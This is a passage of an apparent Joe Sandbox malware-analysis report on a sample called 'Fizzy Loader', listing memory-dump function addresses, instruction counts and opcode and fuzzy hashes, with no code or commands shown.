                                                                                                                                                            Function 00007FF848F587FC Relevance: .2, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 54ef967c9aea454f5d934a3d8d97b034bacd16b5dbd2ff590124615dd9a0819b
                                                                                                                                                            • Instruction ID: b2e5400d5e406ce74820f1bcfb2ca2a0d80efc68966b79424f7f238a5c8fc66e
                                                                                                                                                            • Opcode Fuzzy Hash: 54ef967c9aea454f5d934a3d8d97b034bacd16b5dbd2ff590124615dd9a0819b
                                                                                                                                                            • Instruction Fuzzy Hash: 5051F43281E6C60FE362637458261E6BFE0EF476A1F4905FAC488CB0D3DA1D580B9797
                                                                                                                                                            Function 00007FF848F91110 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2e8a556530b019e61fe08801f88f06df04e155f71ab83cbc34ec3f0ba20d14f4
                                                                                                                                                            • Instruction ID: b987cf87124fc01cc63fb13c718f84eade0a7955ef5021df5112d6d0281ea623
                                                                                                                                                            • Opcode Fuzzy Hash: 2e8a556530b019e61fe08801f88f06df04e155f71ab83cbc34ec3f0ba20d14f4
                                                                                                                                                            • Instruction Fuzzy Hash: 4651A131E0C94A5FEB98FB1894557B527D1EF98794F0441BED40EC72C6EE29AC828784
                                                                                                                                                            Function 00007FF848F5F120 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8a0da2644d9731efe9253c4cd5911f468feded41b8f55c4d7b0d155f29794e85
                                                                                                                                                            • Instruction ID: 00911b95fd11bbd290b4c8781921bd24e031d4ebf14881ca4ab11efc13d4445c
                                                                                                                                                            • Opcode Fuzzy Hash: 8a0da2644d9731efe9253c4cd5911f468feded41b8f55c4d7b0d155f29794e85
                                                                                                                                                            • Instruction Fuzzy Hash: 83515B30A1CA098FDF58EB58C891EB9B3E1FFA8354F444169D44AD7296DF34F8418B85
                                                                                                                                                            Function 00007FF848F40868 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 552345a3de7b3d1dc95d7c01731b1eceae7de7de00a3ab172306d7a11d607658
                                                                                                                                                            • Instruction ID: d7db9e78ec9d85279d9c7f0d24f0d3ceac4f7568c1599670cfd5797ae155a492
                                                                                                                                                            • Opcode Fuzzy Hash: 552345a3de7b3d1dc95d7c01731b1eceae7de7de00a3ab172306d7a11d607658
                                                                                                                                                            • Instruction Fuzzy Hash: 4851F63290D6CA0EE7A2773458251E57FA0DF977A0F0901FBD88CEB1D3DA1D190A8396
                                                                                                                                                            Function 00007FF848F4F1D8 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2d18faa803cdeb7ae5feab85a7adfe80b6e21fec45d516a9f1c6b74e77e26d55
                                                                                                                                                            • Instruction ID: b996f29af2d9d3dd0530cd0c4c4d410fbdda7716840d1a1fe0e2fa9490a0ca8b
                                                                                                                                                            • Opcode Fuzzy Hash: 2d18faa803cdeb7ae5feab85a7adfe80b6e21fec45d516a9f1c6b74e77e26d55
                                                                                                                                                            • Instruction Fuzzy Hash: DF51193690D69A4FE762A7349C111E5BFA0EF833A8F0902B7D08CCB0D3DA1D645A8795
                                                                                                                                                            Function 00007FF848F5F105 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 270b403cd93993610efec9cd3b7a816edf34d78b74efc91ff3f42f5528ae6e7d
                                                                                                                                                            • Instruction ID: 963c40401016d02cd619a3ac358cd7502dd197fe425e9fc5228455eed0b4f677
                                                                                                                                                            • Opcode Fuzzy Hash: 270b403cd93993610efec9cd3b7a816edf34d78b74efc91ff3f42f5528ae6e7d
                                                                                                                                                            • Instruction Fuzzy Hash: 5241E235B1CA195FE758AB1DA8061B977D5EBE87A4F00017FE84AC32D2DE14AC1382C9
                                                                                                                                                            Function 00007FF848F5F108 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9ce15dcddb56ec14b9a36b625511f59fab8a16a12d0ca8aaaf7a1355450e7253
                                                                                                                                                            • Instruction ID: ec02051dde6effcc08130a8174b9561a7a75825860e0d1b320a291a4fcc248f4
                                                                                                                                                            • Opcode Fuzzy Hash: 9ce15dcddb56ec14b9a36b625511f59fab8a16a12d0ca8aaaf7a1355450e7253
                                                                                                                                                            • Instruction Fuzzy Hash: 4141D435B1CA195FE758BB1DA8061B977D5EBE87A4F00017FE84AC32D2DE187C1282D9
                                                                                                                                                            Function 00007FF848F5CBB8 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9feac2967ca70a13ad9490100db099fd2485d1c958887eff5219e146180c2332
                                                                                                                                                            • Instruction ID: a5fd29445cdc734f27b2be99907c76b51784a9dd03cabd2222bab0979238105f
                                                                                                                                                            • Opcode Fuzzy Hash: 9feac2967ca70a13ad9490100db099fd2485d1c958887eff5219e146180c2332
                                                                                                                                                            • Instruction Fuzzy Hash: 44417F3061CE0A5FE748FB2C9455A75B7E1EF98350B1401BEE00EC72E6DF24E8828785
                                                                                                                                                            Function 00007FF848F58E0A Relevance: .2, Instructions: 171COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eb1064c23630110a2e5c35f1b119fcf31328f9d1dee18641cf38f2dc229684a8
                                                                                                                                                            • Instruction ID: ac23d25cb5799136ff704069416a143e1192c5891e33314d163208ef79e5eb1d
                                                                                                                                                            • Opcode Fuzzy Hash: eb1064c23630110a2e5c35f1b119fcf31328f9d1dee18641cf38f2dc229684a8
                                                                                                                                                            • Instruction Fuzzy Hash: DF41B731B1CA0A8FDB88FB6C945967677E2EFA9340F50057AD00EC72D7DE38A9458744
                                                                                                                                                            Function 00007FF848F81020 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1fcff1fe675e426880f7ed16f69ee4b3ea74f0c78388e9e67b3e237493dbf72a
                                                                                                                                                            • Instruction ID: b8fadf6a28b5f73326a99c75eb6e8552dbfc0017517819e05220b7f6a8009e16
                                                                                                                                                            • Opcode Fuzzy Hash: 1fcff1fe675e426880f7ed16f69ee4b3ea74f0c78388e9e67b3e237493dbf72a
                                                                                                                                                            • Instruction Fuzzy Hash: 92411930708A088FD7A8EB2CD499B6577D2EF59751F0501BAE48EC72A6DF24AC81C785
                                                                                                                                                            Function 00007FF848F40A38 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b573eda9d87a8df15a9d7503860742b30fe3829dd1c274eb68d0ca7c2e3e9a6c
                                                                                                                                                            • Instruction ID: 1f1ab2904602ae246fbaf4c11cd404f46565f08dafbb67cf07b60cafe876ccbb
                                                                                                                                                            • Opcode Fuzzy Hash: b573eda9d87a8df15a9d7503860742b30fe3829dd1c274eb68d0ca7c2e3e9a6c
                                                                                                                                                            • Instruction Fuzzy Hash: A0512374508A4E8FDB85FF58C8446AA73F1FF98340F504A6AE819D72D6CB74E851CB44
                                                                                                                                                            Function 00007FF848F499CE Relevance: .2, Instructions: 159COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0fc1153a8bb9b7775a4dbdcd876829d0606b5e8ae2e70a4f4162f59ffebf12c1
                                                                                                                                                            • Instruction ID: 8bd5d64c581c45dfa8e118015691f5d36eeaf4d469bfc98e96169ea6e15eab4a
                                                                                                                                                            • Opcode Fuzzy Hash: 0fc1153a8bb9b7775a4dbdcd876829d0606b5e8ae2e70a4f4162f59ffebf12c1
                                                                                                                                                            • Instruction Fuzzy Hash: 9B410654F0F95F1FE68AF768A0292BD2682CFD5AC0F14047AD06DEB5DBDE2E29018305
                                                                                                                                                            Function 00007FF848F54B39 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ec47b42c72139c782be3f4d0f43f103841a7e9d4019db0761fa814efb60ad18e
                                                                                                                                                            • Instruction ID: 41e01cd6dca226dba50d627120a781ef878ba0fdc941108dd058d2ce215482f1
                                                                                                                                                            • Opcode Fuzzy Hash: ec47b42c72139c782be3f4d0f43f103841a7e9d4019db0761fa814efb60ad18e
                                                                                                                                                            • Instruction Fuzzy Hash: 66418070B1CA4A8FDB8DEF2C8468A7577E2EFA9341F1045B9D00AC72D6DE38A8458744
                                                                                                                                                            Function 00007FF848F54617 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: db304b3a78bcc27188946753d5bac1602452b14a3534f3001f9e493fbace1c13
                                                                                                                                                            • Instruction ID: 708f60f63c51b8cc670941b061778a456f70ff00470059b4656036130fa1bd05
                                                                                                                                                            • Opcode Fuzzy Hash: db304b3a78bcc27188946753d5bac1602452b14a3534f3001f9e493fbace1c13
                                                                                                                                                            • Instruction Fuzzy Hash: 4B4126B190CA5E4FE768EF28A8552FAB7A1FF96790F000079E01DC71C3DB3868168785
                                                                                                                                                            Function 00007FF848F42E19 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bf0f79e25c1ff85173e8bf13aa6c0f670f8c3136cf1f751667404a08cc4920b5
                                                                                                                                                            • Instruction ID: 816471cf64c9cbbed3774027b400abd2c0f564559d86d72a91a921cfb9787614
                                                                                                                                                            • Opcode Fuzzy Hash: bf0f79e25c1ff85173e8bf13aa6c0f670f8c3136cf1f751667404a08cc4920b5
                                                                                                                                                            • Instruction Fuzzy Hash: 01411631A1DB855FE309BB6C985617577D1EF96B50F0402BFE44DC32D3DE28A842829A
                                                                                                                                                            Function 00007FF848F47D5D Relevance: .2, Instructions: 154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9bdd8ee9d90b5ed4854942be02e21eed7cdb89cb8e5ca034f85cd830b03da890
                                                                                                                                                            • Instruction ID: c5c65be0e5eb9f79e927cdff3c77930bf881d805b67227584253718694dba326
                                                                                                                                                            • Opcode Fuzzy Hash: 9bdd8ee9d90b5ed4854942be02e21eed7cdb89cb8e5ca034f85cd830b03da890
                                                                                                                                                            • Instruction Fuzzy Hash: BC41E23190D98A4FD746FB788815AE97BF0EF6A750F0401FBD049D71E3CE18A8468391
                                                                                                                                                            Function 00007FF848F5F1B0 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 517ff61b8912d9e3136639a056066d800a7ee9eeb2636b5f1acad23f9a9f0d8d
                                                                                                                                                            • Instruction ID: 7fbde4188d8633eb17fb7649336dbb0a790ca054f38a6050c1e1a7af66fa30bd
                                                                                                                                                            • Opcode Fuzzy Hash: 517ff61b8912d9e3136639a056066d800a7ee9eeb2636b5f1acad23f9a9f0d8d
                                                                                                                                                            • Instruction Fuzzy Hash: C341E130B0D91A8FE6A9EB298444775B2D1FF9839DF558279D00EC79C5DF29E8818344
                                                                                                                                                            Function 00007FF848F93E68 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4faea5cb959c4303c01ac68e3406d9474e50f54b7acbeaf47c81603e1532ae7f
                                                                                                                                                            • Instruction ID: 1bd11931f3fcde38103dbb6e7f3a6844bcda1d6cc9f850bb34cda3b49e9edfe4
                                                                                                                                                            • Opcode Fuzzy Hash: 4faea5cb959c4303c01ac68e3406d9474e50f54b7acbeaf47c81603e1532ae7f
                                                                                                                                                            • Instruction Fuzzy Hash: E9419231A0CB454FE7A4E728C444B66B7D1FF54389F0845BAD08AC35D1DB6CB885C740
                                                                                                                                                            Function 00007FF848F41B55 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5a0c9a91926f157e56a61f7e988efc5fb16928028bcef02c3ea6957664a47329
                                                                                                                                                            • Instruction ID: 83235721de124840fd6ab127333ad937e48a21f03842fcc959c06346f510f222
                                                                                                                                                            • Opcode Fuzzy Hash: 5a0c9a91926f157e56a61f7e988efc5fb16928028bcef02c3ea6957664a47329
                                                                                                                                                            • Instruction Fuzzy Hash: 33519270A0CA8A8FDB88DF18D860AA537A1FF69704F1406ADD45DC72C3CB35E856C744
                                                                                                                                                            Function 00007FF848F515A0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 55fd03143810ce714be993d966d674472aa0f489d8d939fe08e858183f1d1dc9
                                                                                                                                                            • Instruction ID: 6c107581321baf95b60723871c065d7bd467c05fa1b1c0a1ac7ee10a0fc25f3d
                                                                                                                                                            • Opcode Fuzzy Hash: 55fd03143810ce714be993d966d674472aa0f489d8d939fe08e858183f1d1dc9
                                                                                                                                                            • Instruction Fuzzy Hash: 3541A231F1C9590EF7A9732C6845379A7C1EF997D0F1805BBE01EC22DBDE1C9841428A
                                                                                                                                                            Function 00007FF848F5D80D Relevance: .1, Instructions: 145COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8eb2e7df4c87b8d9e1b4df3a22f483029ad6697c18445c69e5eb2e84bf72b30c
                                                                                                                                                            • Instruction ID: e8f7999833acf4f02f53ad94d8411a01899bb25fcb554bb7b1c819e96942b942
                                                                                                                                                            • Opcode Fuzzy Hash: 8eb2e7df4c87b8d9e1b4df3a22f483029ad6697c18445c69e5eb2e84bf72b30c
                                                                                                                                                            • Instruction Fuzzy Hash: 2D312A32A2DD095FF788F72CA4596F577D1EF8A3A0F0502BAD44EC7197DE29A8428344
                                                                                                                                                            Function 00007FF848F44068 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3f3a91b74023cbbccd1175445034236e5ee56531682dbf1982e1a35fef97d35b
                                                                                                                                                            • Instruction ID: 5d760db019eba6997ee0bcb8d17018c894815c0388700d203651c93536264868
                                                                                                                                                            • Opcode Fuzzy Hash: 3f3a91b74023cbbccd1175445034236e5ee56531682dbf1982e1a35fef97d35b
                                                                                                                                                            • Instruction Fuzzy Hash: A5418071E0994A8FEB88EF1884542BA77E1FFB8755F14413AD41AE32C5DF38A8428B44
                                                                                                                                                            Function 00007FF848F5F140 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 21c08cbbcab3177939671845a5c8adc8b8db174c3afaec44f7eca16bb00a4390
                                                                                                                                                            • Instruction ID: 2f6d9a6aee51ce746bff1223e1027b325afa78b69b8e618c393ab59db9f6c1b7
                                                                                                                                                            • Opcode Fuzzy Hash: 21c08cbbcab3177939671845a5c8adc8b8db174c3afaec44f7eca16bb00a4390
                                                                                                                                                            • Instruction Fuzzy Hash: 6131B971A1CA195FEB5CBB1C68062B977D1EBA4794F10027FE84AC32D6DF247C5242C9
                                                                                                                                                            Function 00007FF848F849D0 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 39e5b5d66fb5bfa51ec892b39bf980be610343a49d59f0f992342ce7ef548500
                                                                                                                                                            • Instruction ID: b067b82380aae1595ad11384ccd2f9f94d4432e83c93565dfdbb5da1da9cb091
                                                                                                                                                            • Opcode Fuzzy Hash: 39e5b5d66fb5bfa51ec892b39bf980be610343a49d59f0f992342ce7ef548500
                                                                                                                                                            • Instruction Fuzzy Hash: AA315931B1DD090FE798FB2C9445A7937D2EFE93A0B1401B9D44EC729BDE14AC428388
                                                                                                                                                            Function 00007FF848F50B21 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d3bd5083fcaa1c84d8e1c1af5bf8393b4eaf30c960a1f43631adcf6edd22b8e1
                                                                                                                                                            • Instruction ID: c9b053f093d7cfe7d5c07f53b23de95ebfd5cb4d65187b6a31a48f0fa7ea11d7
                                                                                                                                                            • Opcode Fuzzy Hash: d3bd5083fcaa1c84d8e1c1af5bf8393b4eaf30c960a1f43631adcf6edd22b8e1
                                                                                                                                                            • Instruction Fuzzy Hash: E0411234A18A0E8FDB88FF1CC494AAA73E1FF98344F504568E819C7296CB34ED56CB40
                                                                                                                                                            Function 00007FF848F47EF2 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b8ae4b09bf2c48cbd9c4f089bee73578b0b582bc689e08a28f871f59353e03d3
                                                                                                                                                            • Instruction ID: b5dfa69401330b1e270ff0179ca94fa7bb3becad78bdd79c1564b8cd0f975631
                                                                                                                                                            • Opcode Fuzzy Hash: b8ae4b09bf2c48cbd9c4f089bee73578b0b582bc689e08a28f871f59353e03d3
                                                                                                                                                            • Instruction Fuzzy Hash: AD419B31A1D94E4FEB45FB6884156F9B7E1EF68690F4400BBD40DF71D2DF28680483A5
                                                                                                                                                            Function 00007FF848F8AAE0 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
